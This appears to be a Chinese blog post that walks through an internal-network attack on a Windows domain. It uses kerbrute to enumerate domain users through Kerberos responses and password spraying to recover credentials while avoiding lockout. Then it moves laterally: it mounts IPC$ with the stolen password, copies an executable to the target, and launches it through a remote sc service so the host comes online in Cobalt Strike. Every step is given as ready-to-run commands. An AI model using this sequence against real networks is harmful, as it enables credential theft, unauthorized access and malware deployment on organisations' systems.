内网渗透-横向移动-密码喷洒攻击和域内用(kerbrute使用)

域内用户枚举攻击原理

正常域用户登录主机,我们可以通过 "net user /domain"来列举出域内的用户。但是当我们用非域用户进行登录时,是不能使用 "net user /domain"这条命令的。或者当主机不在域内但是能与域控通信时,以上两种情况我们可以通过以下方法对域内用户进行枚举。

Kerberos本身是一种基于身份认证的协议,在 Kerberos 协议认证的 第一阶段AS-REQ ,当用户不存在时,返回包提示错误。当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。所以可以利用这点,对域内进行域用户枚举和密码喷洒攻击。在AS-REQ阶段客户端向AS发送用户名,AS对用户名进行验证,用户存在和不存在返回的数据包不一样,所以,根据AS的返回包来对域用户进行枚举

实验目标:

把非域内主机横向到域内主机

实验步骤

1.上传kerbrute.exe工具和密码字典

2.使用kerbrute.exe工具爆破域内用户名

kerbrute.exe userenum --dc 域控ip -d 域名 用户名字典.txt

shell C:\Users\31979\Desktop\kerbrute.exe userenum --dc 192.168.113.152 -d test.com C:\Users\31979\Desktop\user.txt

找到jack和krbuser

3.密码喷洒攻击找到用户密码

密码喷洒攻击原理

在确认用户存在后,客户端又会发送一个AS-REQ请求,如果密码正确,则返回AS-REP。否则返回KRB5KDC_ERP_PREAUTH_FAILED

在常规的爆破中,我们都是先用很多密码去碰撞一个账号,这样很容易导致账号被锁定。而密码喷洒就是先用一个密码去碰撞很多账号,此方法能有效的避免账号被锁定的问题

kerbrute.exe passwordspray -d 域名 用户字典 密码

shell C:\Users\31979\Desktop\kerbrute.exe passwordspray -d test.com C:\Users\31979\Desktop\user.txt qax@123

成功找到这两个用户的密码,那我们在这个域中,就可以直接登录他们的机器了

4.得到用户密码后,让该主机在cs上线

先用 net use 挂载 IPC$ 授权,再 copy

shell net use \\192.168.113.154\C$ /user:krbuser qax@123

shell copy 123.exe \\192.168.113.154\C$\

配合系统服务横向移动

sc \\192.168.113.154 create test binpath= "cmd.exe /c c:\123.exe"

sc \\192.168.113.154 start test

成功上线

删除服务

sc \\192.168.17.138 delete test

相关推荐
Tsuki_tl5 分钟前
UDP传输协议
网络·网络协议·udp·传输层·udp校验和·tcp与udp区别·面向数据报
Sagittarius_A*5 分钟前
Open HTTP Redirect 开放重定向漏洞:URL 跳转校验缺陷与绕过技术
网络·安全·web安全·http·dvwa·burp suite
信仰87420 分钟前
HCIA-华为数通基础理论与实践08
网络·笔记·华为
Yiiz.2 小时前
虚拟机网络设置
运维
代码的小搬运工3 小时前
网络请求(NSURL、NSURLRequest、NSURLSessionDataTask、协议回调与 JSON 数据的基本流向)
网络·数据库·json
蓝胖的四次元口袋9 小时前
服务器网络与系统基础-面试题
服务器·网络
乐维_lwops9 小时前
2026年如何实现多分支机构全网设备统一运维监控一
运维·cmdb·运维监控·网管·agent ops
Cx330❀9 小时前
【MySQL基础】一文吃透“表的约束”:从 Null/Default 到主外键的终极安全法则
linux·服务器·数据库·c++·mysql·安全
程序员JerrySUN9 小时前
Jetson 刷机深度解析:flash.sh vs l4t_initrd_flash.sh(含安全与磁盘加密对比)
linux·网络·arm开发·安全·系统安全
aduzhe10 小时前
关于lib文件格式(keil/unix)
服务器·unix